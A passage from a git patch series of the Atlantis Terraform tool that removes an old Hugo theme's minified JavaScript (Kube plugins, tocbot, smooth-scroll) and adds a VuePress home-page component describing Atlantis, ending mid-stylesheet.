this.$target.hasClass("open")},enableEvents:function(){this.detect.isDesktop()&&this.$target.on("mouseover."+this.namespace,$.proxy(this.utils.disableBodyScroll,this.utils)).on("mouseout."+this.namespace,$.proxy(this.utils.enableBodyScroll,this.utils)),$(document).on("scroll."+this.namespace,$.proxy(this.setPosition,this)),$(window).on("resize."+this.namespace,$.proxy(this.setPosition,this)),$(document).on("click."+this.namespace+" touchstart."+this.namespace,$.proxy(this.close,this)),$(document).on("keydown."+this.namespace,$.proxy(this.handleKeyboard,this)),this.$target.find('[data-action="dropdown-close"]').on("click."+this.namespace,$.proxy(this.close,this))},disableEvents:function(){this.$target.off("."+this.namespace),$(document).off("."+this.namespace),$(window).off("."+this.namespace)},handleKeyboard:function(t){27===t.which&&this.close(t)},shouldNotBeClosed:function(t){return"dropdown-close"===$(t).attr("data-action")||t===this.$close[0]?!1:0!==$(t).closest(".dropdown").length},isNavigationFixed:function(){return 0!==this.$element.closest(".fixed").length},getPlacement:function(t){return $(document).height()<t?"top":"bottom"},getOffset:function(t){return this.isNavigationFixed()?this.$element.position():this.$element.offset()},getPosition:function(){return this.isNavigationFixed()?"fixed":"absolute"},setPosition:function(){if(this.detect.isMobile())return void this.$target.addClass("dropdown-mobile");var t,e=this.getPosition(),s=this.getOffset(e),i=this.$target.innerHeight(),n=this.$target.innerWidth(),o=this.getPlacement(s.top+i+this.$element.innerHeight()),a=$(window).width()<s.left+n?n-this.$element.innerWidth():0,h=s.left-a;"bottom"===o?(this.isOpened()||this.$caret.removeClass("up").addClass("down"),this.opts.caretUp=!1,t=s.top+this.$element.outerHeight()+1):(this.opts.animationOpen="show",this.opts.animationClose="hide",this.isOpened()||this.$caret.addClass("up").removeClass("down"),this.opts.caretUp=!0,t=s.top-i-1),this.$target.css({position:e,top:t+"px",left:h+"px"})}},t.Dropdown.inherits(t),t.Plugin.create("Dropdown"),t.Plugin.autoload("Dropdown")}(Kube),function(t){t.Tabs=function(e,s){this.namespace="tabs",this.defaults={equals:!1,active:!1,live:!1,hash:!0,callbacks:["init","next","prev","open","opened","close","closed"]},t.apply(this,arguments),this.start()},t.Tabs.prototype={start:function(){this.opts.live!==!1&&this.buildLiveTabs(),this.tabsCollection=[],this.hashesCollection=[],this.currentHash=[],this.currentItem=!1,this.$items=this.getItems(),this.$items.each($.proxy(this.loadItems,this)),this.$tabs=this.getTabs(),this.currentHash=this.getLocationHash(),this.closeAll(),this.setActiveItem(),this.setItemHeight(),this.callback("init")},getTabs:function(){return $(this.tabsCollection).map(function(){return this.toArray()})},getItems:function(){return this.$element.find("a")},loadItems:function(t,e){var s=this.getItem(e);s.$el.attr("rel",s.hash),this.collectItem(s),s.$parent.hasClass("active")&&(this.currentItem=s,this.opts.active=s.hash),s.$el.on("click.tabs",$.proxy(this.open,this))},collectItem:function(t){this.tabsCollection.push(t.$tab),this.hashesCollection.push(t.hash)},buildLiveTabs:function(){var t=$(this.opts.live);0!==t.length&&(this.$liveTabsList=$("<ul />"),t.each($.proxy(this.buildLiveItem,this)),this.$element.html("").append(this.$liveTabsList))},buildLiveItem:function(t,e){var s=$(e),i=$("<li />"),n=$("<a />"),o=t+1;s.attr("id",this.getLiveItemId(s,o));var a="#"+s.attr("id"),h=this.getLiveItemTitle(s);n.attr("href",a).attr("rel",a).text(h),i.append(n),this.$liveTabsList.append(i)},getLiveItemId:function(t,e){return"undefined"==typeof t.attr("id")?this.opts.live.replace(".","")+e:t.attr("id")},getLiveItemTitle:function(t){return"undefined"==typeof t.attr("data-title")?t.attr("id"):t.attr("data-title")},setActiveItem:function(){this.currentHash?(this.currentItem=this.getItemBy(this.currentHash),this.opts.active=this.currentHash):this.opts.active===!1&&(this.currentItem=this.getItem(this.$items.first()),this.opts.active=this.currentItem.hash),this.addActive(this.currentItem)},addActive:function(t){t.$parent.addClass("active"),t.$tab.removeClass("hide").addClass("open"),this.currentItem=t},removeActive:function(t){t.$parent.removeClass("active"),t.$tab.addClass("hide").removeClass("open"),this.currentItem=!1},next:function(t){t&&t.preventDefault();var e=this.getItem(this.fetchElement("next"));this.open(e.hash),this.callback("next",e)},prev:function(t){t&&t.preventDefault();var e=this.getItem(this.fetchElement("prev"));this.open(e.hash),this.callback("prev",e)},fetchElement:function(t){var e;if(this.currentItem!==!1){if(e=this.currentItem.$parent[t]().find("a"),0===e.length)return}else e=this.$items[0];return e},open:function(t,e){if("undefined"!=typeof t){"object"==typeof t&&t.preventDefault();var s="object"==typeof t?this.getItem(t.target):this.getItemBy(t);this.closeAll(),this.callback("open",s),this.addActive(s),this.pushStateOpen(e,s),this.callback("opened",s)}},pushStateOpen:function(t,e){t!==!1&&this.opts.hash!==!1&&history.pushState(!1,!1,e.hash)},close:function(t){var e=this.getItemBy(t);e.$parent.hasClass("active")&&(this.callback("close",e),this.removeActive(e),this.pushStateClose(),this.callback("closed",e))},pushStateClose:function(){this.opts.hash!==!1&&history.pushState(!1,!1," ")},closeAll:function(){this.$tabs.removeClass("open").addClass("hide"),this.$items.parent().removeClass("active")},getItem:function(t){var e={};return e.$el=$(t),e.hash=e.$el.attr("href"),e.$parent=e.$el.parent(),e.$tab=$(e.hash),e},getItemBy:function(t){var e="number"==typeof t?this.$items.eq(t-1):this.$element.find('[rel="'+t+'"]');return this.getItem(e)},getLocationHash:function(){return this.opts.hash===!1?!1:this.isHash()?top.location.hash:!1},isHash:function(){return!(""===top.location.hash||-1===$.inArray(top.location.hash,this.hashesCollection))},setItemHeight:function(){if(this.opts.equals){var t=this.getItemMaxHeight()+"px";this.$tabs.css("min-height",t)}},getItemMaxHeight:function(){var t=0;return this.$tabs.each(function(){var e=$(this).height();t=e>t?e:t}),t}},t.Tabs.inherits(t),t.Plugin.create("Tabs"),t.Plugin.autoload("Tabs")}(Kube),function(t){t.modalcurrent=null,t.modalwindow=function(e){var s=t.extend({},e,{show:!0}),i=t("<span />");i.modal(s)}}(jQuery),function(t){t.Modal=function(e,s){this.namespace="modal",this.defaults={target:null,show:!1,url:!1,header:!1,width:"600px",height:!1,maxHeight:!1,position:"center",overlay:!0,appendForms:!1,appendFields:!1,animationOpen:"show",animationClose:"hide",callbacks:["open","opened","close","closed"]},t.apply(this,arguments),this.utils=new t.Utils,this.detect=new t.Detect,this.start()},t.Modal.prototype={start:function(){this.hasTarget()&&(this.opts.show?this.load():this.$element.on("click."+this.namespace,$.proxy(this.load,this)))},buildModal:function(){this.$modal=this.$target.find(".modal"),this.$header=this.$target.find(".modal-header"),this.$close=this.$target.find(".close"),this.$body=this.$target.find(".modal-body")},buildOverlay:function(){this.opts.overlay!==!1&&(0!==$("#modal-overlay").length?this.$overlay=$("#modal-overlay"):(this.$overlay=$('<div id="modal-overlay">').addClass("hide"),$("body").prepend(this.$overlay)),this.$overlay.addClass("overlay"))},buildHeader:function(){this.opts.header&&this.$header.html(this.opts.header)},load:function(t){this.buildModal(),this.buildOverlay(),this.buildHeader(),this.opts.url?this.buildContent():this.open(t)},open:function(t){t&&t.preventDefault(),this.isOpened()||(this.detect.isMobile()&&(this.opts.width="96%"),this.opts.overlay&&this.$overlay.removeClass("hide"),this.$target.removeClass("hide"),this.$modal.removeClass("hide"),this.enableEvents(),this.findActions(),this.resize(),$(window).on("resize."+this.namespace,$.proxy(this.resize,this)),this.detect.isDesktop()&&this.utils.disableBodyScroll(),this.$modal.find("input[type=text],input[type=url],input[type=email]").on("keydown."+this.namespace,$.proxy(this.handleEnter,this)),this.callback("open"),this.$modal.animation(this.opts.animationOpen,$.proxy(this.onOpened,this)))},close:function(t){if(this.$modal&&this.isOpened()){if(t){if(this.shouldNotBeClosed(t.target))return;t.preventDefault()}this.callback("close"),this.disableEvents(),this.$modal.animation(this.opts.animationClose,$.proxy(this.onClosed,this)),this.opts.overlay&&this.$overlay.animation(this.opts.animationClose)}},onOpened:function(){this.$modal.addClass("open"),this.callback("opened"),$.modalcurrent=this},onClosed:function(){this.callback("closed"),this.$target.addClass("hide"),this.$modal.removeClass("open"),this.detect.isDesktop()&&this.utils.enableBodyScroll(),this.$body.css("height",""),$.modalcurrent=null},isOpened:function(){return this.$modal.hasClass("open")},getData:function(){var e=new t.FormData(this);return e.set(""),e.get()},buildContent:function(){$.ajax({url:this.opts.url+"?"+(new Date).getTime(),cache:!1,type:"post",data:this.getData(),success:$.proxy(function(t){this.$body.html(t),this.open()},this)})},buildWidth:function(){var t=this.opts.width,e="2%",s="2%",i=t.match(/%$/);parseInt(this.opts.width)>$(window).width()&&!i?t="96%":i||(e="16px",s="16px"),this.$modal.css({width:t,"margin-top":e,"margin-bottom":s})},buildPosition:function(){if("center"===this.opts.position){var t=$(window).height(),e=this.$modal.outerHeight(),s=t/2-e/2+"px";this.detect.isMobile()?s="2%":e>t&&(s="16px"),this.$modal.css("margin-top",s)}},buildHeight:function(){var t=$(window).height();if(this.opts.maxHeight){var e=parseInt(this.$body.css("padding-top"))+parseInt(this.$body.css("padding-bottom")),s=parseInt(this.$modal.css("margin-top"))+parseInt(this.$modal.css("margin-bottom")),i=t-this.$header.innerHeight()-e-s;this.$body.height(i)}else this.opts.height!==!1&&this.$body.css("height",this.opts.height);var n=this.$modal.outerHeight();n>t&&(this.opts.animationOpen="show",this.opts.animationClose="hide")},resize:function(){this.buildWidth(),this.buildPosition(),this.buildHeight()},enableEvents:function(){this.$close.on("click."+this.namespace,$.proxy(this.close,this)),$(document).on("keyup."+this.namespace,$.proxy(this.handleEscape,this)),this.$target.on("click."+this.namespace,$.proxy(this.close,this))},disableEvents:function(){this.$close.off("."+this.namespace),$(document).off("."+this.namespace),this.$target.off("."+this.namespace),$(window).off("."+this.namespace)},findActions:function(){this.$body.find('[data-action="modal-close"]').on("mousedown."+this.namespace,$.proxy(this.close,this))},setHeader:function(t){this.$header.html(t)},setContent:function(t){this.$body.html(t)},setWidth:function(t){this.opts.width=t,this.resize()},getModal:function(){return this.$modal},getBody:function(){return this.$body},getHeader:function(){return this.$header},handleEnter:function(t){13===t.which&&(t.preventDefault(),this.close(!1))},handleEscape:function(t){return 27===t.which?this.close(!1):!0},shouldNotBeClosed:function(t){return"modal-close"===$(t).attr("data-action")||t===this.$close[0]?!1:0!==$(t).closest(".modal").length}},t.Modal.inherits(t),t.Plugin.create("Modal"),t.Plugin.autoload("Modal")}(Kube);
\ No newline at end of file
diff --git a/website/src/themes/kube/static/js/master.js b/website/src/themes/kube/static/js/master.js
deleted file mode 100644
index e69de29bb2..0000000000
diff --git a/website/src/themes/kube/static/js/tocbot.min.js b/website/src/themes/kube/static/js/tocbot.min.js
deleted file mode 100644
index 51be77a578..0000000000
--- a/website/src/themes/kube/static/js/tocbot.min.js
+++ /dev/null
@@ -1,18 +0,0 @@
-!function(e){function t(o){if(n[o])return n[o].exports;var r=n[o]={exports:{},id:o,loaded:!1};return e[o].call(r.exports,r,r.exports,t),r.loaded=!0,r.exports}var n={};return t.m=e,t.c=n,t.p="",t(0)}([/*!*************************!*\
-  !*** ./src/js/index.js ***!
-  \*************************/
-function(e,t,n){var o,r,l;(function(i){!function(n,i){r=[],o=i(n),l="function"==typeof o?o.apply(t,r):o,!(void 0!==l&&(e.exports=l))}("undefined"!=typeof i?i:this.window||this.global,function(e){"use strict";function t(){for(var e={},t=0;t<arguments.length;t++){var n=arguments[t];for(var o in n)h.call(n,o)&&(e[o]=n[o])}return e}function o(e,t,n){t||(t=250);var o,r;return function(){var l=n||this,i=+new Date,s=arguments;o&&i<o+t?(clearTimeout(r),r=setTimeout(function(){o=i,e.apply(l,s)},t)):(o=i,e.apply(l,s))}}var r,l,i,s=n(/*! smooth-scroll */1),c=n(/*! ./default-options.js */2),a={},u={},d=n(/*! ./build-html.js */3),f=n(/*! ./parse-content.js */4),m=(e.document,document.body,!!e.document.querySelector&&!!e.addEventListener),h=Object.prototype.hasOwnProperty;return u.destroy=function(){try{document.querySelector(a.tocSelector).innerHTML=""}catch(e){console.warn("Element not found: "+a.tocSelector)}document.removeEventListener("scroll",this._scrollListener,!1),document.removeEventListener("resize",this._scrollListener,!1),r&&document.removeEventListener("click",this._clickListener,!1),s&&s.destroy()},u.init=function(e){if(m&&(a=t(c,e||{}),this.options=a,this.state={},r=d(a),l=f(a),this._buildHtml=r,this._parseContent=l,u.destroy(),i=l.selectHeadings(a.contentSelector,a.headingSelector),null!==i)){var n=l.nestHeadingsArray(i),h=n.nest;return r.render(a.tocSelector,h),this._scrollListener=o(function(){r.updateToc(i)},a.throttleTimeout),this._scrollListener(),document.addEventListener("scroll",this._scrollListener,!1),document.addEventListener("resize",this._scrollListener,!1),this._clickListener=o(function(e){r.disableTocAnimation(e),r.updateToc(i)},a.throttleTimeout),document.addEventListener("click",this._clickListener,!1),s&&(this.smoothScroll=s.init(t(a.smoothScrollOptions,{callback:r.enableTocAnimation}))),this}},u.refresh=function(e){u.destroy(),u.init(e||this.options)},e.tocbot=u,u})}).call(t,function(){return this}())},/*!******************************************************!*\
-  !*** ./~/smooth-scroll/dist/js/smooth-scroll.min.js ***!
-  \******************************************************/
-function(e,t,n){var o,r,l;(function(n){/*! smooth-scroll v10.2.1 | (c) 2016 Chris Ferdinandi | MIT License | http://github.com/cferdinandi/smooth-scroll */
-!function(n,i){r=[],o=i(n),l="function"==typeof o?o.apply(t,r):o,!(void 0!==l&&(e.exports=l))}("undefined"!=typeof n?n:this.window||this.global,function(e){"use strict";var t,n,o,r,l,i,s,c={},a="querySelector"in document&&"addEventListener"in e,u={selector:"[data-scroll]",selectorHeader:null,speed:500,easing:"easeInOutCubic",offset:0,callback:function(){}},d=function(){var e={},t=!1,n=0,o=arguments.length;"[object Boolean]"===Object.prototype.toString.call(arguments[0])&&(t=arguments[0],n++);for(var r=function(n){for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(t&&"[object Object]"===Object.prototype.toString.call(n[o])?e[o]=d(!0,e[o],n[o]):e[o]=n[o])};n<o;n++){var l=arguments[n];r(l)}return e},f=function(e){return Math.max(e.scrollHeight,e.offsetHeight,e.clientHeight)},m=function(e,t){for(Element.prototype.matches||(Element.prototype.matches=Element.prototype.matchesSelector||Element.prototype.mozMatchesSelector||Element.prototype.msMatchesSelector||Element.prototype.oMatchesSelector||Element.prototype.webkitMatchesSelector||function(e){for(var t=(this.document||this.ownerDocument).querySelectorAll(e),n=t.length;--n>=0&&t.item(n)!==this;);return n>-1});e&&e!==document;e=e.parentNode)if(e.matches(t))return e;return null},h=function(e){"#"===e.charAt(0)&&(e=e.substr(1));for(var t,n=String(e),o=n.length,r=-1,l="",i=n.charCodeAt(0);++r<o;){if(t=n.charCodeAt(r),0===t)throw new InvalidCharacterError("Invalid character: the input contains U+0000.");l+=t>=1&&t<=31||127==t||0===r&&t>=48&&t<=57||1===r&&t>=48&&t<=57&&45===i?"\\"+t.toString(16)+" ":t>=128||45===t||95===t||t>=48&&t<=57||t>=65&&t<=90||t>=97&&t<=122?n.charAt(r):"\\"+n.charAt(r)}return"#"+l},p=function(e,t){var n;return"easeInQuad"===e&&(n=t*t),"easeOutQuad"===e&&(n=t*(2-t)),"easeInOutQuad"===e&&(n=t<.5?2*t*t:-1+(4-2*t)*t),"easeInCubic"===e&&(n=t*t*t),"easeOutCubic"===e&&(n=--t*t*t+1),"easeInOutCubic"===e&&(n=t<.5?4*t*t*t:(t-1)*(2*t-2)*(2*t-2)+1),"easeInQuart"===e&&(n=t*t*t*t),"easeOutQuart"===e&&(n=1- --t*t*t*t),"easeInOutQuart"===e&&(n=t<.5?8*t*t*t*t:1-8*--t*t*t*t),"easeInQuint"===e&&(n=t*t*t*t*t),"easeOutQuint"===e&&(n=1+--t*t*t*t*t),"easeInOutQuint"===e&&(n=t<.5?16*t*t*t*t*t:1+16*--t*t*t*t*t),n||t},v=function(e,t,n){var o=0;if(e.offsetParent)do o+=e.offsetTop,e=e.offsetParent;while(e);return o=Math.max(o-t-n,0),Math.min(o,C()-y())},y=function(){return Math.max(document.documentElement.clientHeight,e.innerHeight||0)},C=function(){return Math.max(document.body.scrollHeight,document.documentElement.scrollHeight,document.body.offsetHeight,document.documentElement.offsetHeight,document.body.clientHeight,document.documentElement.clientHeight)},S=function(e){return e&&"object"==typeof JSON&&"function"==typeof JSON.parse?JSON.parse(e):{}},g=function(e){return e?f(e)+e.offsetTop:0},b=function(t,n,o){o||(t.focus(),document.activeElement.id!==t.id&&(t.setAttribute("tabindex","-1"),t.focus(),t.style.outline="none"),e.scrollTo(0,n))};c.animateScroll=function(n,o,i){var c=S(o?o.getAttribute("data-options"):null),a=d(t||u,i||{},c),f="[object Number]"===Object.prototype.toString.call(n),m=f||!n.tagName?null:n;if(f||m){var h=e.pageYOffset;a.selectorHeader&&!r&&(r=document.querySelector(a.selectorHeader)),l||(l=g(r));var y,x,E=f?n:v(m,l,parseInt(a.offset,10)),N=E-h,O=C(),L=0,H=function(t,r,l){var i=e.pageYOffset;(t==r||i==r||e.innerHeight+i>=O)&&(clearInterval(l),b(n,r,f),a.callback(n,o))},A=function(){L+=16,y=L/parseInt(a.speed,10),y=y>1?1:y,x=h+N*p(a.easing,y),e.scrollTo(0,Math.floor(x)),H(x,E,s)},T=function(){clearInterval(s),s=setInterval(A,16)};0===e.pageYOffset&&e.scrollTo(0,0),T()}};var x=function(t){var r;try{r=h(decodeURIComponent(e.location.hash))}catch(t){r=h(e.location.hash)}n&&(n.id=n.getAttribute("data-scroll-id"),c.animateScroll(n,o),n=null,o=null)},E=function(r){if(0===r.button&&!r.metaKey&&!r.ctrlKey&&(o=m(r.target,t.selector),o&&"a"===o.tagName.toLowerCase()&&o.hostname===e.location.hostname&&o.pathname===e.location.pathname&&/#/.test(o.href))){var l;try{l=h(decodeURIComponent(o.hash))}catch(e){l=h(o.hash)}if("#"===l){r.preventDefault(),n=document.body;var i=n.id?n.id:"smooth-scroll-top";return n.setAttribute("data-scroll-id",i),n.id="",void(e.location.hash.substring(1)===i?x():e.location.hash=i)}n=document.querySelector(l),n&&(n.setAttribute("data-scroll-id",n.id),n.id="",o.hash===e.location.hash&&(r.preventDefault(),x()))}},N=function(e){i||(i=setTimeout(function(){i=null,l=g(r)},66))};return c.destroy=function(){t&&(document.removeEventListener("click",E,!1),e.removeEventListener("resize",N,!1),t=null,n=null,o=null,r=null,l=null,i=null,s=null)},c.init=function(n){a&&(c.destroy(),t=d(u,n||{}),r=t.selectorHeader?document.querySelector(t.selectorHeader):null,l=g(r),document.addEventListener("click",E,!1),e.addEventListener("hashchange",x,!1),r&&e.addEventListener("resize",N,!1))},c})}).call(t,function(){return this}())},/*!***********************************!*\
-  !*** ./src/js/default-options.js ***!
-  \***********************************/
-function(e,t){e.exports={tocSelector:".js-toc",contentSelector:".js-toc-content",headingSelector:"h1, h2, h3",ignoreSelector:".js-toc-ignore",linkClass:"toc-link",extraLinkClasses:"",activeLinkClass:"is-active-link",listClass:"toc-list",extraListClasses:"",isCollapsedClass:"is-collapsed",collapsibleClass:"is-collapsible",listItemClass:"toc-list-item",collapseDepth:0,smoothScrollOptions:{easing:"easeInOutCubic",offset:0,speed:300},headingsOffset:0,throttleTimeout:50,positionFixedSelector:null,positionFixedClass:"is-position-fixed",fixedSidebarOffset:"auto",includeHtml:!1}},/*!******************************!*\
-  !*** ./src/js/build-html.js ***!
-  \******************************/
-function(e,t){e.exports=function(e){function t(e,n){var l=n.appendChild(o(e));if(e.children.length){var i=r(e.isCollapsed);e.children.forEach(function(e){t(e,i)}),l.appendChild(i)}}function n(e,n){var o=!1,l=r(o);n.forEach(function(e){t(e,l)});var i=document.querySelector(e);if(null!==i)return i.firstChild&&i.removeChild(i.firstChild),i.appendChild(l)}function o(t){var n=document.createElement("li"),o=document.createElement("a");return e.listItemClass&&n.setAttribute("class",e.listItemClass),e.includeHtml&&t.childNodes.length?u.call(t.childNodes,function(e){o.appendChild(e.cloneNode(!0))}):o.textContent=t.textContent,o.setAttribute("data-scroll",""),o.setAttribute("href","#"+t.id),o.setAttribute("class",e.linkClass+h+"node-name--"+t.nodeName+h+e.extraLinkClasses),n.appendChild(o),n}function r(t){var n=document.createElement("ul"),o=e.listClass+h+e.extraListClasses;return t&&(o+=h+e.collapsibleClass,o+=h+e.isCollapsedClass),n.setAttribute("class",o),n}function l(){var t=document.documentElement.scrollTop||f.scrollTop,n=document.querySelector(e.positionFixedSelector);"auto"===e.fixedSidebarOffset&&(e.fixedSidebarOffset=document.querySelector(e.tocSelector).offsetTop),t>e.fixedSidebarOffset?n.className.indexOf(e.positionFixedClass)===-1&&(n.className+=h+e.positionFixedClass):n.className=n.className.split(h+e.positionFixedClass).join("")}function i(t){var n=document.documentElement.scrollTop||f.scrollTop;e.positionFixedSelector&&l();var o,r=t;if(m&&null!==document.querySelector(e.tocSelector)&&r.length>0){d.call(r,function(t,l){if(t.offsetTop>n+e.headingsOffset+1){var i=0===l?l:l-1;return o=r[i],!0}if(l===r.length-1)return o=r[r.length-1],!0});var i=document.querySelector(e.tocSelector).querySelectorAll("."+e.linkClass);u.call(i,function(t){t.className=t.className.split(h+e.activeLinkClass).join("")});var c=document.querySelector(e.tocSelector).querySelector("."+e.linkClass+".node-name--"+o.nodeName+'[href="#'+o.id+'"]');c.className+=h+e.activeLinkClass;var a=document.querySelector(e.tocSelector).querySelectorAll("."+e.listClass+"."+e.collapsibleClass);u.call(a,function(t){var n=h+e.isCollapsedClass;t.className.indexOf(n)===-1&&(t.className+=h+e.isCollapsedClass)}),c.nextSibling&&(c.nextSibling.className=c.nextSibling.className.split(h+e.isCollapsedClass).join("")),s(c.parentNode.parentNode)}}function s(t){return t.className.indexOf(e.collapsibleClass)!==-1?(t.className=t.className.split(h+e.isCollapsedClass).join(""),s(t.parentNode.parentNode)):t}function c(t){var n=t.target||t.srcElement;"string"==typeof n.className&&n.className.indexOf(e.linkClass)!==-1&&(m=!1)}function a(){m=!0}var u=[].forEach,d=[].some,f=document.body,m=!0,h=" ";return{enableTocAnimation:a,disableTocAnimation:c,render:n,updateToc:i}}},/*!*********************************!*\
-  !*** ./src/js/parse-content.js ***!
-  \*********************************/
-function(e,t){e.exports=function(e){function t(e){return e[e.length-1]}function n(e){return+e.nodeName.split("H").join("")}function o(t){var o={id:t.id,children:[],nodeName:t.nodeName,headingLevel:n(t),textContent:t.textContent.trim()};return e.includeHtml&&(o.childNodes=t.childNodes),o}function r(r,l){for(var i=o(r),s=n(r),c=l,a=t(c),u=a?a.headingLevel:0,d=s-u;d>0;)a=t(c),a&&void 0!==a.children&&(c=a.children),d--;return s>=e.collapseDepth&&(i.isCollapsed=!0),c.push(i),c}function l(t,n){var o=n;e.ignoreSelector&&(o=n.split(",").map(function(t){return t.trim()+":not("+e.ignoreSelector+")"}));try{return document.querySelector(t).querySelectorAll(o)}catch(e){return console.warn("Element not found: "+t),null}}function i(e){return s.call(e,function(e,t){var n=o(t);return r(n,e.nest),e},{nest:[]})}var s=[].reduce;return{nestHeadingsArray:i,selectHeadings:l}}}]);
-//# sourceMappingURL=tocbot.min.js.map
\ No newline at end of file
diff --git a/website/src/themes/kube/theme.toml b/website/src/themes/kube/theme.toml
deleted file mode 100644
index 58325d8da7..0000000000
--- a/website/src/themes/kube/theme.toml
+++ /dev/null
@@ -1,31 +0,0 @@
-# theme.toml template for a Hugo theme
-# See https://github.com/spf13/hugoThemes#themetoml for an example
-
-name = "Kube Hugo"
-license = "MIT"
-licenselink = "https://github.com/jeblister/kube/master/LICENSE.md"
-description = "Kube is a professional  and a responsive Hugo theme for developers and designers that offers a documentation section mixed with a landing page and a blog."
-homepage = "http://kube.elemnts.org/"
-tags = ["responsive", "kube", "documentation", "landing", "blog", "themes", "professional", "modern"]
-features = ["Minimalism","Mobile-first Design",
-  "Responsive Design",
-  "Horizontal Rhythm",
-  "Typography",
-  "Google Analytics",
-  "Disqus Commenting",
-  "OpenGraph support",
-  "Schema Structured Data",
-  "Paginated Lists",
-  "Reading Time",
-  "Last Modified time",
-  "Word Count",
-  "Related Posts",
-  "Block Templates",
-  "Table of Contents",
-  "SEO Site Verification"]
-min_version = 0.19
-
-[author]
-  name = "jeblister"
-  homepage = "http://findme.surge.sh/"
- 

From a564c7e075309d0f31cea0fa441c0e49c419d412 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Mon, 25 Jun 2018 08:18:59 +0100
Subject: [PATCH 47/69] Docs

---
 runatlantis.io/.vuepress/components/Home.vue  |  21 --
 .../.vuepress/components/HomeCustom.vue       | 154 ++++++++
 runatlantis.io/.vuepress/config.js            |  24 +-
 runatlantis.io/README.md                      |  25 +-
 runatlantis.io/docs/README.md                 | 339 +-----------------
 .../docs/atlantis-yaml-reference.md           |  45 +++
 runatlantis.io/docs/contributing.md           |  21 --
 runatlantis.io/docs/deployment.md             |  94 ++++-
 runatlantis.io/docs/getting-started.md        |   0
 runatlantis.io/docs/pull-request-commands.md  |  40 ++-
 runatlantis.io/docs/security.md               |  37 ++
 runatlantis.io/guide/README.md                |  58 +++
 runatlantis.io/guide/getting-started.md       | 171 +++++++++
 runatlantis.io/guide/images/atlantis-logo.png | Bin 0 -> 14750 bytes
 .../images/atlantis-walkthrough-icon.png      | Bin 0 -> 79344 bytes
 .../guide/images/pr-comment-apply.png         | Bin 0 -> 19474 bytes
 .../guide/images/pr-comment-help.png          | Bin 0 -> 19736 bytes
 .../guide/images/pr-comment-plan.png          | Bin 0 -> 19305 bytes
 runatlantis.io/guide/images/status.png        | Bin 0 -> 45991 bytes
 runatlantis.io/guide/requirements.md          |  83 +++++
 runatlantis.io/guide/test-drive.md            |  18 +
 server/events/atlantis_workspace_locker.go    |  30 +-
 .../mocks/mock_atlantis_workspace_locker.go   |  51 +--
 server/events/project_command_builder.go      |   4 +-
 server/events/project_command_runner.go       |   4 +-
 25 files changed, 738 insertions(+), 481 deletions(-)
 delete mode 100644 runatlantis.io/.vuepress/components/Home.vue
 create mode 100644 runatlantis.io/.vuepress/components/HomeCustom.vue
 create mode 100644 runatlantis.io/docs/atlantis-yaml-reference.md
 delete mode 100644 runatlantis.io/docs/contributing.md
 delete mode 100644 runatlantis.io/docs/getting-started.md
 create mode 100644 runatlantis.io/docs/security.md
 create mode 100644 runatlantis.io/guide/README.md
 create mode 100644 runatlantis.io/guide/getting-started.md
 create mode 100644 runatlantis.io/guide/images/atlantis-logo.png
 create mode 100644 runatlantis.io/guide/images/atlantis-walkthrough-icon.png
 create mode 100644 runatlantis.io/guide/images/pr-comment-apply.png
 create mode 100644 runatlantis.io/guide/images/pr-comment-help.png
 create mode 100644 runatlantis.io/guide/images/pr-comment-plan.png
 create mode 100644 runatlantis.io/guide/images/status.png
 create mode 100644 runatlantis.io/guide/requirements.md
 create mode 100644 runatlantis.io/guide/test-drive.md

diff --git a/runatlantis.io/.vuepress/components/Home.vue b/runatlantis.io/.vuepress/components/Home.vue
deleted file mode 100644
index d118f3a8c1..0000000000
--- a/runatlantis.io/.vuepress/components/Home.vue
+++ /dev/null
@@ -1,21 +0,0 @@
-<template>
-  <div class="home">
-    <div class="hero">
-      <img :src="$withBase(data.heroImage)" alt="hero">
-      <h1>{{ data.heroText || $title || 'Hello' }}</h1>
-      <p class="description">
-        {{ data.tagline || $description || 'Welcome to your VuePress site' }}
-      </p>
-      <p class="action" >
-        <NavLink class="action-button" :item="actionLink"/>
-      </p>
-    </div>
-    <div class="features">
-      <div class="feature">
-        <h2>{{ feature.title }}</h2>
-        <p>{{ feature.details }}</p>
-      </div>
-    </div>
-    <Content custom/>
-  </div>
-</template>
diff --git a/runatlantis.io/.vuepress/components/HomeCustom.vue b/runatlantis.io/.vuepress/components/HomeCustom.vue
new file mode 100644
index 0000000000..fb7bf325ab
--- /dev/null
+++ b/runatlantis.io/.vuepress/components/HomeCustom.vue
@@ -0,0 +1,154 @@
+<template>
+  <div class="home">
+    <div class="hero">
+      <img v-if="data.heroImage" :src="$withBase(data.heroImage)" alt="hero">
+      <h1>{{ data.heroText || $title || 'Hello' }}</h1>
+      <p class="description">
+        {{ data.tagline || $description || 'Welcome to your VuePress site' }}
+      </p>
+      <p class="action" v-if="data.actionText && data.actionLink">
+        <a href="/guide/" class="nav-link action-button">Get Started →</a>
+      </p>
+    </div>
+    <div class="features">
+      <div class="feature">
+        <h2>What is it?</h2>
+        <p>A standalone application that listens for Terraform pull request events via webhooks. You deploy it yourself.</p>
+      </div>
+      <div class="feature">
+        <h2>What does it do?</h2>
+        <p>Runs <b><code>terraform plan</code></b> and <b><code>apply</code></b> remotely and comments back on the pull request with the output.</p>
+      </div>
+      <div class="feature">
+        <h2>Why should you use it?</h2>
+        <ul><li>Make Terraform changes <b>visible</b> to your whole team.</li><li>Enable non-operations engineers to <b>collaborate</b> on Terraform.</li><li><b>Standardize</b> your Terraform workflows.</li></ul>
+      </div>
+    </div>
+    <Content custom/>
+    <div class="footer" v-if="data.footer">
+      {{ data.footer }}
+    </div>
+  </div>
+</template>
+
+<script>
+export default {
+  computed: {
+    data () {
+      return this.$page.frontmatter
+    },
+    actionLink () {
+      return {
+        link: this.data.actionLink,
+        text: this.data.actionText
+      }
+    }
+  }
+}
+</script>
+
+<style lang="stylus">
+// colors
+$accentColor = #3eaf7c
+$textColor = #2c3e50
+$borderColor = #eaecef
+$codeBgColor = #282c34
+$arrowBgColor = #ccc
+
+// layout
+$navbarHeight = 3.6rem
+$sidebarWidth = 20rem
+$contentWidth = 740px
+
+// responsive breakpoints
+$MQNarrow = 959px
+$MQMobile = 719px
+$MQMobileNarrow = 419px
+
+@import '~@temp/override.styl' // generated from user config
+
+.home
+  padding $navbarHeight 2rem 0
+  max-width 960px
+  margin 0px auto
+  .hero
+    text-align center
+    img
+      max-height 280px
+      display block
+      margin 3rem auto 1.5rem
+    h1
+      font-size 3rem
+    h1, .description, .action
+      margin 1.8rem auto
